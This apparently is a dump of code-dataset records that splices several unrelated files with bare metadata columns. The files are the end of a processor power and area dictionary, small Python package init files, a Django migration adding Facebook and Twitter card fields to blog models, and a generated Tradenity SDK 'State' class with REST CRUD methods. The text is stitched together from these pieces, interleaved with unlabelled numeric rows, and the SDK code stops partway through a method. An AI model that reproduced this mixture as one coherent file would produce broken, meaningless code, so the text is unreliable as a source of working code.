'Gate Leakage': 0.0484137,
'Peak Dynamic': 0.282264,
'Runtime Dynamic': 0.0831713,
'Subthreshold Leakage': 6.80085,
'Subthreshold Leakage with power gating': 3.32364}],
'Processor': {'Area': 191.908,
'Gate Leakage': 1.53485,
'Peak Dynamic': 73.8327,
'Peak Power': 106.945,
'Runtime Dynamic': 15.6615,
'Subthreshold Leakage': 31.5774,
'Subthreshold Leakage with power gating': 13.9484,
'Total Cores/Area': 128.669,
'Total Cores/Gate Leakage': 1.4798,
'Total Cores/Peak Dynamic': 73.5505,
'Total Cores/Runtime Dynamic': 15.5783,
'Total Cores/Subthreshold Leakage': 24.7074,
'Total Cores/Subthreshold Leakage with power gating': 10.2429,
'Total L3s/Area': 61.9075,
'Total L3s/Gate Leakage': 0.0484137,
'Total L3s/Peak Dynamic': 0.282264,
'Total L3s/Runtime Dynamic': 0.0831713,
'Total L3s/Subthreshold Leakage': 6.80085,
'Total L3s/Subthreshold Leakage with power gating': 3.32364,
'Total Leakage': 33.1122,
'Total NoCs/Area': 1.33155,
'Total NoCs/Gate Leakage': 0.00662954,
'Total NoCs/Peak Dynamic': 0.0,
'Total NoCs/Runtime Dynamic': 0.0,
'Total NoCs/Subthreshold Leakage': 0.0691322,
'Total NoCs/Subthreshold Leakage with power gating': 0.0259246}}
| 75.084245
| 124
| 0.682151
| 8,083
| 68,627
| 5.785723
| 0.068168
| 0.123509
| 0.112903
| 0.093401
| 0.938289
| 0.929842
| 0.917055
| 0.886841
| 0.862614
| 0.841894
| 0
| 0.132204
| 0.22427
| 68,627
| 914
| 125
| 75.084245
| 0.746262
| 0
| 0
| 0.642232
| 0
| 0
| 0.657239
| 0.048085
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c7f5743783e0f0f03cd0f84a64c0c56f1d88d695
| 110
|
py
|
Python
|
fintulib/__init__.py
|
TheDr1ver/fintulib
|
8ed45562d1b5452696288d22363691fbe085afd5
|
[
"MIT"
] | null | null | null |
fintulib/__init__.py
|
TheDr1ver/fintulib
|
8ed45562d1b5452696288d22363691fbe085afd5
|
[
"MIT"
] | null | null | null |
fintulib/__init__.py
|
TheDr1ver/fintulib
|
8ed45562d1b5452696288d22363691fbe085afd5
|
[
"MIT"
] | 1
|
2022-01-27T15:41:14.000Z
|
2022-01-27T15:41:14.000Z
|
from fintulib import common
from fintulib import model
from fintulib import wrangle
from fintulib import cloud
| 27.5
| 28
| 0.863636
| 16
| 110
| 5.9375
| 0.4375
| 0.505263
| 0.757895
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.136364
| 110
| 4
| 29
| 27.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
1bf9a6fd61a0ee11d2c08aeaea337dbc6f3dd2c1
| 5,160
|
py
|
Python
|
app/modules/blog_posts/migrations/0004_auto_20200402_1442.py
|
nickmoreton/nhsx-website
|
2397d1308376c02b75323d30e6bc916af0daac9d
|
[
"MIT"
] | 50
|
2019-04-04T17:50:00.000Z
|
2021-08-05T15:08:37.000Z
|
app/modules/blog_posts/migrations/0004_auto_20200402_1442.py
|
nickmoreton/nhsx-website
|
2397d1308376c02b75323d30e6bc916af0daac9d
|
[
"MIT"
] | 434
|
2019-04-04T18:25:32.000Z
|
2022-03-31T18:23:37.000Z
|
app/modules/blog_posts/migrations/0004_auto_20200402_1442.py
|
nhsx-mirror/nhsx-website
|
2133b4e275ca35ff77f7d6874e809f139ec4bf86
|
[
"MIT"
] | 23
|
2019-04-04T09:52:07.000Z
|
2021-04-11T07:41:47.000Z
|
# Generated by Django 3.0.4 on 2020-04-02 14:42
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
("images", "0001_initial"),
("blog_posts", "0003_auto_20200402_0748"),
]
operations = [
migrations.AddField(
model_name="blogpost",
name="fb_og_description",
field=models.CharField(
blank=True,
help_text="Facebook OG description - max 300 chars",
max_length=300,
null=True,
),
),
migrations.AddField(
model_name="blogpost",
name="fb_og_image",
field=models.ForeignKey(
blank=True,
help_text="Facebook OG image",
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="+",
to="images.NHSXImage",
),
),
migrations.AddField(
model_name="blogpost",
name="fb_og_title",
field=models.CharField(
blank=True,
help_text="Facebook OG title - max 40 chars",
max_length=40,
null=True,
),
),
migrations.AddField(
model_name="blogpost",
name="twitter_card_alt_text",
field=models.CharField(
blank=True,
help_text="Twitter card image alt text - max 100 chars",
max_length=100,
null=True,
),
),
migrations.AddField(
model_name="blogpost",
name="twitter_card_description",
field=models.CharField(
blank=True,
help_text="Twitter card description - max 200 chars",
max_length=200,
null=True,
),
),
migrations.AddField(
model_name="blogpost",
name="twitter_card_image",
field=models.ForeignKey(
blank=True,
help_text="Twitter card image",
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="+",
to="images.NHSXImage",
),
),
migrations.AddField(
model_name="blogpost",
name="twitter_card_title",
field=models.CharField(
blank=True,
help_text="Twitter card title - max 40 chars",
max_length=40,
null=True,
),
),
migrations.AddField(
model_name="blogpostindexpage",
name="fb_og_description",
field=models.CharField(
blank=True,
help_text="Facebook OG description - max 300 chars",
max_length=300,
null=True,
),
),
migrations.AddField(
model_name="blogpostindexpage",
name="fb_og_image",
field=models.ForeignKey(
blank=True,
help_text="Facebook OG image",
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="+",
to="images.NHSXImage",
),
),
migrations.AddField(
model_name="blogpostindexpage",
name="fb_og_title",
field=models.CharField(
blank=True,
help_text="Facebook OG title - max 40 chars",
max_length=40,
null=True,
),
),
migrations.AddField(
model_name="blogpostindexpage",
name="twitter_card_alt_text",
field=models.CharField(
blank=True,
help_text="Twitter card image alt text - max 100 chars",
max_length=100,
null=True,
),
),
migrations.AddField(
model_name="blogpostindexpage",
name="twitter_card_description",
field=models.CharField(
blank=True,
help_text="Twitter card description - max 200 chars",
max_length=200,
null=True,
),
),
migrations.AddField(
model_name="blogpostindexpage",
name="twitter_card_image",
field=models.ForeignKey(
blank=True,
help_text="Twitter card image",
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="+",
to="images.NHSXImage",
),
),
migrations.AddField(
model_name="blogpostindexpage",
name="twitter_card_title",
field=models.CharField(
blank=True,
help_text="Twitter card title - max 40 chars",
max_length=40,
null=True,
),
),
]
| 31.463415
| 72
| 0.479264
| 450
| 5,160
| 5.306667
| 0.144444
| 0.073702
| 0.134841
| 0.158291
| 0.917504
| 0.917504
| 0.917504
| 0.917504
| 0.899497
| 0.899497
| 0
| 0.029452
| 0.427519
| 5,160
| 163
| 73
| 31.656442
| 0.778944
| 0.008721
| 0
| 0.942675
| 1
| 0
| 0.191277
| 0.022101
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.012739
| 0
| 0.031847
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
4019c3402eb782167193c6b0195f2d55db43ef50
| 71
|
py
|
Python
|
python/eda/eda/components/__init__.py
|
32bitmicro/EDA
|
476a7f6dda23a494788bfdfaa27dff7082a80d6d
|
[
"BSD-3-Clause"
] | 1
|
2019-06-05T20:01:19.000Z
|
2019-06-05T20:01:19.000Z
|
python/eda/eda/components/__init__.py
|
32bitmicro/EDA
|
476a7f6dda23a494788bfdfaa27dff7082a80d6d
|
[
"BSD-3-Clause"
] | null | null | null |
python/eda/eda/components/__init__.py
|
32bitmicro/EDA
|
476a7f6dda23a494788bfdfaa27dff7082a80d6d
|
[
"BSD-3-Clause"
] | null | null | null |
from eda.components.component import *
from eda.components.ST import *
| 23.666667
| 38
| 0.802817
| 10
| 71
| 5.7
| 0.6
| 0.245614
| 0.596491
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.112676
| 71
| 2
| 39
| 35.5
| 0.904762
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
40e0664af37796187c6580eb9fe43aca8083e573
| 253
|
py
|
Python
|
pyVenv/src/InventoryManagement/InvManage/views/__init__.py
|
thephilosophicaljijutsumaster/InventoryManagement
|
7c57fcc435976c39b249106642ee848da2eea201
|
[
"MIT"
] | null | null | null |
pyVenv/src/InventoryManagement/InvManage/views/__init__.py
|
thephilosophicaljijutsumaster/InventoryManagement
|
7c57fcc435976c39b249106642ee848da2eea201
|
[
"MIT"
] | 12
|
2020-07-05T14:30:46.000Z
|
2020-08-06T21:06:00.000Z
|
pyVenv/src/InventoryManagement/InvManage/views/__init__.py
|
thephilosophicaljijutsumaster/InventoryManagement
|
7c57fcc435976c39b249106642ee848da2eea201
|
[
"MIT"
] | null | null | null |
from .product_views import *
from .goods_receipt_note_views import *
from .purchase_order_views import *
from .company_views import *
from .vendor_views import *
from .consumer_views import *
from .sales_order_views import *
from .history_views import *
| 31.625
| 39
| 0.814229
| 36
| 253
| 5.388889
| 0.388889
| 0.453608
| 0.541237
| 0.206186
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12253
| 253
| 8
| 40
| 31.625
| 0.873874
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
40f89acae399f79fe09a8934146f64e3372a93a8
| 180
|
py
|
Python
|
src/ehrlich_aberth_jax/__init__.py
|
fbartolic/extending-jax
|
d15fcbca5b8facc074c4ee4fa789351ffca2fac2
|
[
"MIT"
] | null | null | null |
src/ehrlich_aberth_jax/__init__.py
|
fbartolic/extending-jax
|
d15fcbca5b8facc074c4ee4fa789351ffca2fac2
|
[
"MIT"
] | null | null | null |
src/ehrlich_aberth_jax/__init__.py
|
fbartolic/extending-jax
|
d15fcbca5b8facc074c4ee4fa789351ffca2fac2
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
__all__ = ["__version__", "ehrlich_aberth"]
from .ehrlich_aberth_jax import ehrlich_aberth
from .ehrlich_aberth_jax_version import version as __version__
| 25.714286
| 62
| 0.777778
| 23
| 180
| 5.26087
| 0.478261
| 0.429752
| 0.280992
| 0.396694
| 0.545455
| 0.545455
| 0
| 0
| 0
| 0
| 0
| 0.006289
| 0.116667
| 180
| 6
| 63
| 30
| 0.754717
| 0.116667
| 0
| 0
| 0
| 0
| 0.159236
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
9056c6f1ee0e05497d0ffb4a0fa76c4c363725f8
| 27,008
|
py
|
Python
|
tradenity/resources/state.py
|
tradenity/python-sdk
|
d13fbe23f4d6ff22554c6d8d2deaf209371adaf1
|
[
"Apache-2.0"
] | 1
|
2020-03-19T04:09:17.000Z
|
2020-03-19T04:09:17.000Z
|
tradenity/resources/state.py
|
tradenity/python-sdk
|
d13fbe23f4d6ff22554c6d8d2deaf209371adaf1
|
[
"Apache-2.0"
] | null | null | null |
tradenity/resources/state.py
|
tradenity/python-sdk
|
d13fbe23f4d6ff22554c6d8d2deaf209371adaf1
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Tradenity API
Tradenity eCommerce Rest API
Contact: support@tradenity.com
"""
from __future__ import absolute_import
import re
import pprint
# python 2 and python 3 compatibility library
import six
from tradenity.api_client import ApiClient
class State(object):
swagger_types = {
'id': 'str',
'meta': 'InstanceMeta',
'name': 'str',
'code': 'str',
'country': 'Country'
}
attribute_map = {
'id': 'id',
'meta': '__meta',
'name': 'name',
'code': 'code',
'country': 'country'
}
api_client = None
def __init__(self, id=None, meta=None, name=None, code=None, country=None):
"""State - a model defined in Swagger"""
self._id = id
self._meta = None
self._name = None
self._code = None
self._country = None
self.discriminator = None
if meta is not None:
self.meta = meta
self.name = name
if code is not None:
self.code = code
self.country = country
@property
def id(self):
if self._id:
return self._id
elif self.meta is None:
return None
else:
self._id = self.meta.href.split("/")[-1]
return self._id
@id.setter
def id(self, new_id):
self._id = new_id
@property
def meta(self):
"""Gets the meta of this State.
:return: The meta of this State.
:rtype: InstanceMeta
"""
return self._meta
@meta.setter
def meta(self, meta):
"""Sets the meta of this State.
:param meta: The meta of this State.
:type: InstanceMeta
"""
self._meta = meta
@property
def name(self):
"""Gets the name of this State.
:return: The name of this State.
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this State.
:param name: The name of this State.
:type: str
"""
self._name = name
@property
def code(self):
"""Gets the code of this State.
:return: The code of this State.
:rtype: str
"""
return self._code
@code.setter
def code(self, code):
"""Sets the code of this State.
:param code: The code of this State.
:type: str
"""
self._code = code
@property
def country(self):
"""Gets the country of this State.
:return: The country of this State.
:rtype: Country
"""
return self._country
@country.setter
def country(self, country):
"""Sets the country of this State.
:param country: The country of this State.
:type: Country
"""
self._country = country
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(State, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, State):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
@classmethod
def get_api_client(cls):
if cls.api_client is None:
cls.api_client = ApiClient.instance()
return cls.api_client
@classmethod
def find_all(cls, **kwargs):
return cls.list_all_states(**kwargs)
@classmethod
def find_all_by(cls, **kwargs):
return cls.list_all_states(**kwargs)
@classmethod
def find_one_by(cls, **kwargs):
results = cls.list_all_states(**kwargs)
if len(results) > 0:
return results[0]
@classmethod
def find_by_id(cls, id):
return cls.get_state_by_id(id)
def create(self):
new_instance = self.create_state(self)
self.id = new_instance.id
return self
def update(self):
return self.update_state_by_id(self.id, self)
def delete(self):
return self.delete_state_by_id(self.id)
@classmethod
def create_state(cls, state, **kwargs):
"""Create State
Create a new State
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_state(state, async=True)
>>> result = thread.get()
:param async bool
:param State state: Attributes of state to create (required)
:return: State
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return cls._create_state_with_http_info(state, **kwargs)
else:
(data) = cls._create_state_with_http_info(state, **kwargs)
return data
@classmethod
def _create_state_with_http_info(cls, state, **kwargs):
"""Create State
Create a new State
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_state_with_http_info(state, async=True)
>>> result = thread.get()
:param async bool
:param State state: Attributes of state to create (required)
:return: State
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['state']
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
query_params = []
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
query_params.append((key, val))
params[key] = val
del params['kwargs']
# verify the required parameter 'state' is set
if ('state' not in params or
params['state'] is None):
raise ValueError("Missing the required parameter `state` when calling `create_state`")
collection_formats = {}
path_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'state' in params:
body_params = params['state']
# HTTP header `Accept`
header_params['Accept'] = cls.get_api_client().select_header_accept(
['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = cls.get_api_client().select_header_content_type(
['application/json'])
# Authentication setting
auth_settings = []
return cls.get_api_client().call_api(
'/states', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='State',
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
@classmethod
def delete_state_by_id(cls, state_id, **kwargs):
"""Delete State
Delete an instance of State by its ID.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_state_by_id(state_id, async=True)
>>> result = thread.get()
:param async bool
:param str state_id: ID of state to delete. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return cls._delete_state_by_id_with_http_info(state_id, **kwargs)
else:
(data) = cls._delete_state_by_id_with_http_info(state_id, **kwargs)
return data
@classmethod
def _delete_state_by_id_with_http_info(cls, state_id, **kwargs):
"""Delete State
Delete an instance of State by its ID.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_state_by_id_with_http_info(state_id, async=True)
>>> result = thread.get()
:param async bool
:param str state_id: ID of state to delete. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['state_id']
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
query_params = []
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
query_params.append((key, val))
params[key] = val
del params['kwargs']
# verify the required parameter 'state_id' is set
if ('state_id' not in params or
params['state_id'] is None):
raise ValueError("Missing the required parameter `state_id` when calling `delete_state_by_id`")
collection_formats = {}
path_params = {}
if 'state_id' in params:
path_params['stateId'] = params['state_id']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = cls.get_api_client().select_header_accept(
['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = cls.get_api_client().select_header_content_type(
['application/json'])
# Authentication setting
auth_settings = []
return cls.get_api_client().call_api(
'/states/{stateId}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
@classmethod
def get_state_by_id(cls, state_id, **kwargs):
"""Find State
Return single instance of State by its ID.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_state_by_id(state_id, async=True)
>>> result = thread.get()
:param async bool
:param str state_id: ID of state to return (required)
:return: State
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return cls._get_state_by_id_with_http_info(state_id, **kwargs)
else:
(data) = cls._get_state_by_id_with_http_info(state_id, **kwargs)
return data
@classmethod
def _get_state_by_id_with_http_info(cls, state_id, **kwargs):
    """Find State -- transport-level implementation for get_state_by_id.

    Return single instance of State by its ID.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, set the `async` flag in kwargs
    (on Python 3.7+ spell it **{'async': True}, since `async` is a
    reserved keyword there).

    :param async bool
    :param str state_id: ID of state to return (required)
    :return: State
             If the method is called asynchronously,
             returns the request thread.
    :raises ValueError: if `state_id` is missing or None.
    """
    # Parameters this endpoint recognizes; anything else supplied in
    # **kwargs is forwarded as a query-string parameter.
    all_params = ['state_id']
    all_params.append('async')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    query_params = []

    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            query_params.append((key, val))
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'state_id' is set
    if params.get('state_id') is None:
        raise ValueError("Missing the required parameter `state_id` when calling `get_state_by_id`")

    collection_formats = {}

    path_params = {}
    if 'state_id' in params:
        path_params['stateId'] = params['state_id']

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = cls.get_api_client().select_header_accept(
        ['application/json'])

    # HTTP header `Content-Type`
    header_params['Content-Type'] = cls.get_api_client().select_header_content_type(
        ['application/json'])

    # Authentication setting
    auth_settings = []

    # FIX: `async` is a reserved word in Python 3.7+, so it cannot be a
    # literal keyword argument; pass it via dict unpacking instead
    # (runtime-equivalent, and parseable on all Python 3 versions).
    return cls.get_api_client().call_api(
        '/states/{stateId}', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='State',
        auth_settings=auth_settings,
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats,
        **{'async': params.get('async')})
@classmethod
def list_all_states(cls, **kwargs):
    """List States.

    Return a list of States, optionally paginated and sorted.

    The request is synchronous by default; set the `async` flag in
    kwargs to receive the request thread instead of the decoded data.

    :param async bool
    :param int page: page number
    :param int size: page size
    :param str sort: page order
    :return: page[State]
             If the method is called asynchronously,
             returns the request thread.
    """
    kwargs['_return_http_data_only'] = True
    # The helper honours the `async` flag itself, so a single call
    # covers both the synchronous and asynchronous paths.
    result = cls._list_all_states_with_http_info(**kwargs)
    return result
@classmethod
def _list_all_states_with_http_info(cls, **kwargs):
    """List States -- transport-level implementation for list_all_states.

    Return a list of States.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, set the `async` flag in kwargs
    (on Python 3.7+ spell it **{'async': True}, since `async` is a
    reserved keyword there).

    :param async bool
    :param int page: page number
    :param int size: page size
    :param str sort: page order
    :return: page[State]
             If the method is called asynchronously,
             returns the request thread.
    """
    # Parameters this endpoint recognizes; anything else supplied in
    # **kwargs is forwarded as a query-string parameter.
    all_params = ['page', 'size', 'sort']
    all_params.append('async')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    query_params = []

    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            query_params.append((key, val))
        params[key] = val
    del params['kwargs']

    collection_formats = {}

    path_params = {}

    # Pagination/sorting parameters are only sent when supplied.
    if 'page' in params:
        query_params.append(('page', params['page']))
    if 'size' in params:
        query_params.append(('size', params['size']))
    if 'sort' in params:
        query_params.append(('sort', params['sort']))

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = cls.get_api_client().select_header_accept(
        ['application/json'])

    # HTTP header `Content-Type`
    header_params['Content-Type'] = cls.get_api_client().select_header_content_type(
        ['application/json'])

    # Authentication setting
    auth_settings = []

    # FIX: `async` is a reserved word in Python 3.7+, so it cannot be a
    # literal keyword argument; pass it via dict unpacking instead
    # (runtime-equivalent, and parseable on all Python 3 versions).
    return cls.get_api_client().call_api(
        '/states', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='page[State]',
        auth_settings=auth_settings,
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats,
        **{'async': params.get('async')})
@classmethod
def replace_state_by_id(cls, state_id, state, **kwargs):
    """Replace State.

    Replace all attributes of the State identified by `state_id`.

    The request is synchronous by default; set the `async` flag in
    kwargs to receive the request thread instead of the decoded data.

    :param async bool
    :param str state_id: ID of state to replace (required)
    :param State state: Attributes of state to replace (required)
    :return: State
             If the method is called asynchronously,
             returns the request thread.
    """
    kwargs['_return_http_data_only'] = True
    # The helper honours the `async` flag itself, so a single call
    # covers both the synchronous and asynchronous paths.
    result = cls._replace_state_by_id_with_http_info(state_id, state, **kwargs)
    return result
@classmethod
def _replace_state_by_id_with_http_info(cls, state_id, state, **kwargs):
    """Replace State -- transport-level implementation for replace_state_by_id.

    Replace all attributes of State.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, set the `async` flag in kwargs
    (on Python 3.7+ spell it **{'async': True}, since `async` is a
    reserved keyword there).

    :param async bool
    :param str state_id: ID of state to replace (required)
    :param State state: Attributes of state to replace (required)
    :return: State
             If the method is called asynchronously,
             returns the request thread.
    :raises ValueError: if `state_id` or `state` is missing or None.
    """
    # Parameters this endpoint recognizes; anything else supplied in
    # **kwargs is forwarded as a query-string parameter.
    all_params = ['state_id', 'state']
    all_params.append('async')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    query_params = []

    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            query_params.append((key, val))
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'state_id' is set
    if params.get('state_id') is None:
        raise ValueError("Missing the required parameter `state_id` when calling `replace_state_by_id`")
    # verify the required parameter 'state' is set
    if params.get('state') is None:
        raise ValueError("Missing the required parameter `state` when calling `replace_state_by_id`")

    collection_formats = {}

    path_params = {}
    if 'state_id' in params:
        path_params['stateId'] = params['state_id']

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    # The replacement State is sent as the request body.
    if 'state' in params:
        body_params = params['state']
    # HTTP header `Accept`
    header_params['Accept'] = cls.get_api_client().select_header_accept(
        ['application/json'])

    # HTTP header `Content-Type`
    header_params['Content-Type'] = cls.get_api_client().select_header_content_type(
        ['application/json'])

    # Authentication setting
    auth_settings = []

    # FIX: `async` is a reserved word in Python 3.7+, so it cannot be a
    # literal keyword argument; pass it via dict unpacking instead
    # (runtime-equivalent, and parseable on all Python 3 versions).
    return cls.get_api_client().call_api(
        '/states/{stateId}', 'PUT',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='State',
        auth_settings=auth_settings,
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats,
        **{'async': params.get('async')})
@classmethod
def update_state_by_id(cls, state_id, state, **kwargs):
    """Update State.

    Update (patch) attributes of the State identified by `state_id`.

    The request is synchronous by default; set the `async` flag in
    kwargs to receive the request thread instead of the decoded data.

    :param async bool
    :param str state_id: ID of state to update. (required)
    :param State state: Attributes of state to update. (required)
    :return: State
             If the method is called asynchronously,
             returns the request thread.
    """
    kwargs['_return_http_data_only'] = True
    # The helper honours the `async` flag itself, so a single call
    # covers both the synchronous and asynchronous paths.
    result = cls._update_state_by_id_with_http_info(state_id, state, **kwargs)
    return result
@classmethod
def _update_state_by_id_with_http_info(cls, state_id, state, **kwargs):
    """Update State -- transport-level implementation for update_state_by_id.

    Update attributes of State.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, set the `async` flag in kwargs
    (on Python 3.7+ spell it **{'async': True}, since `async` is a
    reserved keyword there).

    :param async bool
    :param str state_id: ID of state to update. (required)
    :param State state: Attributes of state to update. (required)
    :return: State
             If the method is called asynchronously,
             returns the request thread.
    :raises ValueError: if `state_id` or `state` is missing or None.
    """
    # Parameters this endpoint recognizes; anything else supplied in
    # **kwargs is forwarded as a query-string parameter.
    all_params = ['state_id', 'state']
    all_params.append('async')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    query_params = []

    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            query_params.append((key, val))
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'state_id' is set
    if params.get('state_id') is None:
        raise ValueError("Missing the required parameter `state_id` when calling `update_state_by_id`")
    # verify the required parameter 'state' is set
    if params.get('state') is None:
        raise ValueError("Missing the required parameter `state` when calling `update_state_by_id`")

    collection_formats = {}

    path_params = {}
    if 'state_id' in params:
        path_params['stateId'] = params['state_id']

